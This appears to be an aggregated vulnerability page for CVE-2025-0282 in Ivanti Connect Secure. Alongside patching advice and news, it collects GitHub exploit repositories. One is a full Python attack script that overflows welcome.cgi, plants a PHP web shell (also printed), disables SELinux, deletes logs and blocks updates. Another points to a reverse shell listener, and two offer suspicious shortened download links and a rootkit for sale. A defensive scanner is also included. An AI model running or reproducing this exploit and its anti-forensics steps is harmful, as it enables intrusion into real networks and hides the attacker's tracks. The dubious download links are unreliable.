CVE-2025-0282
Remediation Guide
Expert-verified security guidance by HuntDB
The vulnerability CVE-2025-0282 is a stack-based buffer overflow that affects Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA gateways. This vulnerability allows a remote unauthenticated attacker to achieve remote code execution. To remediate this vulnerability, you need to upgrade the affected Ivanti products to a version that includes a fix for this vulnerability.
Firstly, identify the Ivanti products and their versions that are running in your environment. You can use the show version command in the product's command-line interface to determine the version. For example, if you are running Ivanti Connect Secure, you would log in to the command-line interface and run the show version command. The output will include the product version.
Once you have identified the affected products and their versions, you need to download the appropriate patches from the Ivanti website. Navigate to the Ivanti Security Advisory and locate the patches for the affected products. Download the patches that correspond to your product versions.
After downloading the patches, you need to apply them to the affected products. The process for applying patches varies depending on the product. Generally, you would log in to the product's administrative interface, navigate to the software update section, and follow the prompts to upload and install the patch. For example, in Ivanti Connect Secure, you would log in to the administrative interface, navigate to System > Software Update, click on 'Choose File', select the downloaded patch file, and then click on 'Upload and Install'.
Once the patch is installed, you need to verify that the patch has been applied successfully and that the product version has been updated. You can do this by running the show version command again in the product's command-line interface. The output should show the new product version.
Finally, it is recommended to monitor the system logs for any unusual activity that could indicate a successful exploit of the vulnerability. You can do this by navigating to the logs section in the product's administrative interface and reviewing the logs for any suspicious entries. For example, in Ivanti Connect Secure, you would navigate to System > Log/Monitoring, and review the logs.
In conclusion, remediating CVE-2025-0282 involves identifying the affected Ivanti products and their versions, downloading the appropriate patches, applying the patches, verifying the patch installation, and monitoring the system logs.
CVSS Score
V3.1EPSS Score
v2023.03.01There is a 15.3% chance that this vulnerability will be exploited in the wild within the next 30 days.
Attack Vector Metrics
Impact Metrics
Description
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
Available Exploits
Related News
A newly published report by Yuma Masubuchi from the JPCERT Coordination Center (JPCERT/CC) has uncovered the deployment of The post DslogdRAT Malware Targets Ivanti Connect Secure via CVE-2025-0282 Zero-Day Exploit appeared first on Daily CyberSecurity.
Cybersecurity researchers are warning about a new malware called DslogdRAT that's installed following the exploitation of a now-patched security flaw in Ivanti Connect Secure (ICS). The malware, along with a web shell, were "installed by exploiting a zero-day…
CISA recommends immediate action to address malware variant RESURGE exploiting Ivanti vulnerability CVE-2025-0282
Cybersecurity researchers at JPCERT/CC have uncovered a significant upgrade to the SPAWN malware family, introducing SPAWNCHIMERA, a more The post SPAWNCHIMERA: New Malware Exploits Ivanti Zero-Day Flaw (CVE-2025-0282) appeared first on Cybersecurity News.
Palo Alto Networks has issued a detailed threat briefing on two critical vulnerabilities in Ivanti products—CVE-2025-0282 and CVE-2025-0283. The post CL-UNK-0979 Exploit Zero-Day Flaw in Ivanti Connect Secure to Gain Access to Networks appeared first on Cybersecurity News.
Affected Products
Affected Versions:
Known Exploited Vulnerability
This vulnerability is actively being exploited in the wild
Remediation Status
Due Date
Added to KEV
Required Action
Apply mitigations as set forth in the CISA instructions linked below to include conducting hunt activities, taking remediation actions if applicable, and applying updates prior to returning a device to service.
Affected Product
Ransomware Risk
GitHub Security Advisories
Community-driven vulnerability intelligence from GitHub
Advisory Details
CVSS Scoring
CVSS Score
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
References
Advisory provided by GitHub Security Advisory Database. Published: January 9, 2025, Modified: January 28, 2025
GitHub Repositories
# CVE-2025-0282: Remote Code Execution Vulnerability in [StorkS]
Languages
Latest Commits
Rename Run.py to exploit.py
README.md
Update Run.py
Source Files
# Storks: Remote Code Execution Vulnerability Exploitation Tool
## Overview
Storks is a Python-based Proof-of-Concept (PoC) tool designed to demonstrate a critical Remote Code Execution (RCE) vulnerability, identified as **CVE-2025-0282**, in a specific network appliance. This vulnerability can be exploited by sending a crafted POST request to a specific endpoint. This tool is intended for educational and research purposes only.
**Disclaimer:** Please note that using this tool on systems without proper authorization is illegal and unethical. We are not responsible for any damages or actions caused by misuse of this tool. Please use it responsibly and at your own risk.
## Vulnerability Description
The `/dana-na/auth/url_default/welcome.cgi` endpoint is vulnerable to a buffer overflow, which can be exploited to achieve remote code execution by overwriting the return address on the stack. This allows the attacker to execute arbitrary shellcode, potentially leading to full control of the system. The exploit uses Return-Oriented Programming (ROP) to bypass ASLR and execute the shell code correctly.
## How to Use
1. **Prerequisites:**
* A working Python 3.6+ environment.
* Libraries: `requests`, `struct`, `socket`, `ssl`, `urllib3`, `pymongo`, `openai`, `bson` and `google-generativeai`.
* WSL (Windows Subsystem for Linux) is recommended for `msfvenom`.
* A MongoDB server.
* An OpenAI API key.
* A reverse shell listener.
2. **Obtain Storks:** To obtain the full Storks application and secure download link, please contact me on Telegram: @AnonStorks
3. **Set up a Listener:** Configure your system to listen on the specified IP and port.
4. **Run the Exploit:** After obtaining the code, you can execute the Storks application and follow the on-screen prompts.
```bash
python exploit.py <target_ip>
```
* Replace `<target_ip>` with the IP address of the vulnerable target.
5. **Wait for success or error:** The code will attempt the exploit until it succeeds or until you stop it.
## Technical Details
The exploit attempts to gain code execution by exploiting a buffer overflow vulnerability present in the `/dana-na/auth/url_default/welcome.cgi` endpoint. The code attempts to overwrite the return address and inject shellcode into the vulnerable process. The code uses the following steps:
1. **Connects to the target:** Code first attempts to connect to the target system on port 443.
2. **Gets data from OpenAI:** Code makes a request to OpenAI API for system and exit address and a shell code.
3. **Generates Payload:** Code creates a partial overwrite payload with addresses from OpenAI API and a shell code generated by msfvenom or OpenAI.
4. **Sends payload:** Code sends the payload to the target system.
5. **Validates payload:** Checks for a specific pattern in the response of the server and makes a connection back to the attacker IP and port.
6. **Tries again:** The code repeats steps above until the connection is successful.
7. **Saves results:** After a successful connection, the results are stored in a MongoDB.
## Important Notes
* The Storks application is provided for educational purposes only. Use at your own risk and responsibly.
* Exploiting systems without authorization is illegal.
* This is a very specific exploit and may not work in all cases or versions of the vulnerable target.
* You can use the Storks application for testing and learning, but it must not be used for malicious purposes.
* Do not attempt to use this tool on a system that you do not have explicit permission to test.
## Disclaimer
The Storks application is provided "as is" without any warranty. The author is not responsible for any damages or illegal actions caused by the use of this code. Use responsibly and ethically.
## Contributing
Contributions are welcome. Feel free to open pull requests or report issues.
## Contact
For full code and secure download link, please contact me on Telegram: @AnonStorks
import requests
import sys
import struct
import socket
import ssl
import urllib3
import re
import time
import random
import threading
import statistics
import openai
import os
from pymongo import MongoClient
from datetime import datetime
import json
import subprocess
from bson.int64 import Int64
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# MongoDB setup
MONGO_URI = "mongodb://localhost:27017/"
DATABASE_NAME = "Cyin"
client = MongoClient(MONGO_URI)
db = client[DATABASE_NAME]
collection = db["exploit_results"]
# OpenAI API setup
OPENAI_API_KEY = "XXXX" # Add your open ai api key
openai.api_key = OPENAI_API_KEY
OFFSET = 500
ATTEMPT_LIMIT = 256
ATTACKER_IP = "127.0.0.1"
ATTACKER_PORT = 4444
NUMBER_OF_ATTEMPTS = 5
chat_history = []
MAX_RETRIES = 3
DEFAULT_SHELLCODE = b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
MAGIC_STRING = b"__EXPLOIT_SUCCESS__"
....
....
....
...
..
.
#For full code and secure download link, please contact me on Telegram: @AnonStorks
CVE-2025-0282 is a critical vulnerability found in Ivanti Connect Secure, allowing Remote Command Execution (RCE) through a buffer overflow exploit.
Languages
Latest Commits
Create shell.php
CVE_2025_0282_Ivanti.py
CVE_2025_0282_Ivanti.py
Source Files
Noneimport requests
import sys
import struct
import socket
import ssl
import urllib3
import time
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
payload = b"A" * offset # Fill the buffer
payload += struct.pack("<I", system_address) # Overwrite return address with system()
payload += b"BBBB" # Fake return address
payload += struct.pack("<I", command_address) # Address of the command
payload += command.encode() # Command to execute
return payload
def send_payload(target_ip, payload):
try:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)
ssl_sock.connect((target_ip, 443))
print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")
exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
http_request = (
f"POST {exploit_endpoint} HTTP/1.1\r\n"
f"Host: {target_ip}\r\n"
f"Content-Length: {len(payload)}\r\n"
f"Content-Type: application/x-www-form-urlencoded\r\n"
f"\r\n"
).encode() + payload
ssl_sock.send(http_request)
response = ssl_sock.recv(4096)
ssl_sock.close()
return response.decode(errors="replace")
except Exception as e:
print(f"[-] Error sending payload: {e}")
return None
def exploit_vulnerability(target_ip, command):
payload = create_exploit_payload(command)
response = send_payload(target_ip, payload)
if response:
print("[+] Payload sent successfully.")
else:
print("[-] No response received.")
def upload_web_shell(target_ip, local_shell_path):
try:
with open(local_shell_path, "r") as f:
web_shell_content = f.read()
command = f"echo '{web_shell_content}' > /shell.php"
exploit_vulnerability(target_ip, command)
print("[+] Web shell uploaded successfully at /shell.php.")
verify_shell(target_ip)
except Exception as e:
print(f"[-] Error uploading web shell: {e}")
def verify_shell(target_ip):
shell_url = f"http://{target_ip}/shell.php"
try:
response = requests.get(shell_url, verify=False, timeout=10)
if response.status_code == 200:
print("[+] Web shell is accessible.")
else:
print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
except Exception as e:
print(f"[-] Error verifying web shell: {e}")
def execute_shell_command(target_ip, command):
shell_url = f"http://{target_ip}/shell.php"
try:
response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
if response.status_code == 200:
print(f"[+] Command output:\n{response.text.strip()}")
else:
print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
except Exception as e:
print(f"[-] Error executing command via web shell: {e}")
def disable_selinux(target_ip):
command = "setenforce 0"
execute_shell_command(target_ip, command)
print("[+] SELinux disabled.")
def prevent_syslog_forwarding(target_ip):
command = "sed -i '/^*.* @/d' /etc/rsyslog.conf"
execute_shell_command(target_ip, command)
command = "systemctl restart rsyslog"
execute_shell_command(target_ip, command)
print("[+] Syslog forwarding disabled.")
def remount_drive_rw(target_ip):
command = "mount -o remount,rw /"
execute_shell_command(target_ip, command)
print("[+] Drive remounted as read-write.")
def remove_log_entries(target_ip):
command = "sed -i '/CVE-2025-0282/d' /var/log/*"
execute_shell_command(target_ip, command)
print("[+] Log entries related to the exploit removed.")
def enable_selinux(target_ip):
command = "setenforce 1"
execute_shell_command(target_ip, command)
print("[+] SELinux re-enabled.")
def remount_drive_ro(target_ip):
command = "mount -o remount,ro /"
execute_shell_command(target_ip, command)
print("[+] Drive remounted as read-only.")
def disable_updates(target_ip):
commands = [
"systemctl stop apt-daily.service",
"systemctl disable apt-daily.service"
]
for command in commands:
execute_shell_command(target_ip, command)
print("[+] System updates disabled successfully.")
def main():
if len(sys.argv) != 3:
print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
sys.exit(1)
target_ip = sys.argv[1]
local_shell_path = sys.argv[2]
upload_web_shell(target_ip, local_shell_path)
disable_selinux(target_ip)
prevent_syslog_forwarding(target_ip)
remount_drive_rw(target_ip)
remove_log_entries(target_ip)
enable_selinux(target_ip)
remount_drive_ro(target_ip)
while True:
command = input("Enter command to execute on the target (or 'exit' to quit): ")
if command.lower() == "exit":
print("Exiting...")
break
execute_shell_command(target_ip, command)
if __name__ == "__main__":
main()
None# CVE-2025-0282-Ivanti-exploit
CVE-2025-0282 is a critical vulnerability found in Ivanti Connect Secure, allowing Remote Command Execution (RCE) through a buffer overflow exploit.
This vulnerability enables attackers to upload malicious files (e.g., web shells) and execute commands on the target system with elevated privileges.
It is highly recommended to update affected systems to the latest version to mitigate the risk of exploitation.
## Uploading a Web Shell
To use the tool for uploading a web shell to the target system:
```
python3 CVE_2025_0282_Ivanti.py <target_ip> <local_shell_path>
```
* <target_ip>: The IP address of the target server.
* <local_shell_path>: Path to the web shell file on your local machine.
## Executing Remote Commands
After successfully uploading the web shell, the tool allows you to execute commands on the target system interactively.
<div align="center">
<img src="poc.png" alt="Proof of Concept 1" width="800"/>
</div>
None<?php
// Usage: http://target.com/shell.php?cmd=<command>
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
echo "<pre>" . shell_exec($cmd) . "</pre>";
} else {
echo "No command provided.";
}
?>
Safely detect if an Ivanti server is vulnerable to CVE-2025-0282
Languages
Latest Commits
Add blog link
Fix scope check
Add scope check
Source Files
None# CVE-2025-0282-check
Safely detect if an Ivanti server is vulnerable to CVE-2025-0282. Refer to our [blog post](https://bishopfox.com/blog/analysis-and-scanner-for-ivanti-cve-2025-0282) for more details.
## Usage
```
./scan-cve-2025-0282.py <SCHEME://HOST[:PORT]>
```
If you don't specify the port, it will default to 443.
```
$ ./scan-cve-2025-0282.py https://192.168.50.208
https://192.168.50.208:443: Vulnerable
$ ./scan-cve-2025-0282.py https://192.168.50.135
https://192.168.50.135:443: Patched
$ ./scan-cve-2025-0282.py https://192.168.50.47
https://192.168.50.47:443: Version 9.1.12.6427 is not affected
```
Use `parallel` to scan multiple targets in one go. Put each target on a separate line and save it to `targets.txt`, then run the following (`-j` controls how many threads are run in parallel):
```
$ cat targets.txt | parallel -j 10 './scan-cve-2025-0282.py {}'
https://192.168.50.208:443: Vulnerable
https://192.168.50.135:443: Patched
https://192.168.50.47:443: Version 9.1.12.6427 is not affected
```
## How it works
Patched systems restrict the size of multiple fields in the clientInfo string, even though CVE-2025-0282 can only be triggered through clientCapabilties. As a result, we can just look for an error response when validation fails on a patched system. Patched systems return an ERROR, and unpatched systems will timeout waiting for the client to perform EAP authentication.
#!/usr/bin/env python3
import re, requests, socket, ssl, struct, sys, urllib3, warnings
def check_version(scheme, host, port):
warnings.filterwarnings(
"ignore", category=urllib3.exceptions.InsecureRequestWarning
)
try:
resp = requests.get(
f"{scheme}://{host}:{port}/dana-na/auth/url_admin/welcome.cgi?type=inter",
verify=False,
timeout=10,
)
resp.raise_for_status()
match = re.search(r'<PARAM NAME="ProductVersion"\s+VALUE="([0-9.]+)', resp.text)
if match:
version = match.group(1)
if version.startswith("22.7.2.") or version in [
"22.7.1.907", # IPS 22.7.1R1
"22.7.1.1321", # IPS 22.7.1R1.1
"22.7.1.1485", # IPS 22.7.1R1.2
]:
return True
else:
print(f"{scheme}://{host}:{port}: Version {version} is not affected")
return False
except:
print(f"{scheme}://{host}:{port}: No response from web server")
return False
def p32(x):
return struct.pack("<I", x)
def negotiate_ifttls(scheme, host, port):
try:
ctx = ssl._create_unverified_context()
s = ctx.wrap_socket(socket.create_connection((host, port), timeout=3))
except:
print(f"{scheme}://{host}:{port}: Failed to create TLS socket connection")
exit()
req = b"GET / HTTP/1.1\r\n"
req += f"Host: {host}\r\n".encode()
req += b"User-Agent: BishopFox\r\n"
req += b"Content-Type: EAP\r\n"
req += b"Upgrade: IF-T/TLS 1.0\r\n"
req += b"Content-Length: 0\r\n"
req += b"\r\n"
s.send(req)
resp = s.recv(1024)
if b"HTTP/1.1 101 Switching Protocols" not in resp:
print(f"{scheme}://{host}:{port}: Server does not support IF-T/TLS")
exit()
return s
def send_ift(s, vendor, ptype, seqno, data):
hdr = struct.pack(">IIII", vendor, ptype, len(data) + 16, seqno)
s.send(hdr + data)
def rcv_ift(s):
vendor, ptype, length, seqno = struct.unpack(">IIII", s.read(16))
data = s.read(length - 16)
return vendor, ptype, data
def main():
# Parse input
if len(sys.argv) < 1:
print("Usage: scan-cve-2025-0282.py <SCHEME://HOST[:PORT]>")
exit()
parts = sys.argv[1].split(":")
scheme = parts[0]
host = parts[1].lstrip("/")
if len(parts) == 2:
port = 443
else:
port = int(parts[2])
if scheme.lower() != "https":
print(f"{scheme}://{host}:{port}: Target scheme is not https")
exit()
# Check version
if not check_version(scheme, host, port):
exit()
# Create socket connection
s = negotiate_ifttls(scheme, host, port)
# Send client version request
send_ift(s, 0x5597, 1, 0, b"\x00\x01\x02\x02")
# Receive version response
vendor, ptype, data = rcv_ift(s)
# Receive auth challenge
vendor, ptype, data = rcv_ift(s)
# Send auth response
payload = b"clientHostname=BishopFox"
payload += b" clientIp=" + b"A" * 0x40
payload += b"\n\0"
send_ift(s, 0xA4C, 0x88, 1, payload)
send_ift(s, 0xA4C, 0x88, 2, b"anonymous\n\0")
# Evaluate vulnerability status
try:
vendor, ptype, data = rcv_ift(s)
if vendor == 0xA4C and ptype == 0x93:
print(f"{scheme}://{host}:{port}: Patched")
else:
print(
f"{scheme}://{host}:{port}: Unexpected response: vendor={hex(vendor)}, type={hex(ptype)}, data={data.hex()}"
)
except socket.timeout:
print(f"{scheme}://{host}:{port}: Vulnerable")
if __name__ == "__main__":
main()
Ivanti (unsecure connect) zero click unauthenticated code execution
Latest Commits
Update README.md
Add files via upload
Initial commit
Source Files
None# CVE-2025-0282-PoC
Ivanti (unsecure connect) zero click unauthenticated code execution
CVE-2025-0282 a stack-based buffer overflow which leads to unauthenticate RCE
Ivanti (unsecure connect) zero click unauthenticated code execution <br>
Can we See Mass exploitation today?
# [Download file: ](https://bit.ly/40d3684)
.
Note: I got my part from this now its time for Ivanti to hurry for update lol<br>
Im selling a priv8 rootkit (mine) too only 2 copies not more <br>
contact me here --> [email protected]
No description available
Latest Commits
README.md
Initial commit
Source Files
# CVE-2025-0282: RCE Ivanti
## Vulnerability Description
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
## Details
+ **CVE ID:** CVE-2025-0282
+ **Published:** 2025-01-08
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.0
## Affected Versions
**Ivanti Connect Secure before version 22.7R2.50**
**Ivanti Policy Secure before version 22.7R1.2**
**Ivanti Neurons for ZTA gateways before version 22.7R2.3**
## Usage
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Exploit
**[Download Here](http://surl.li/vvhnzy)**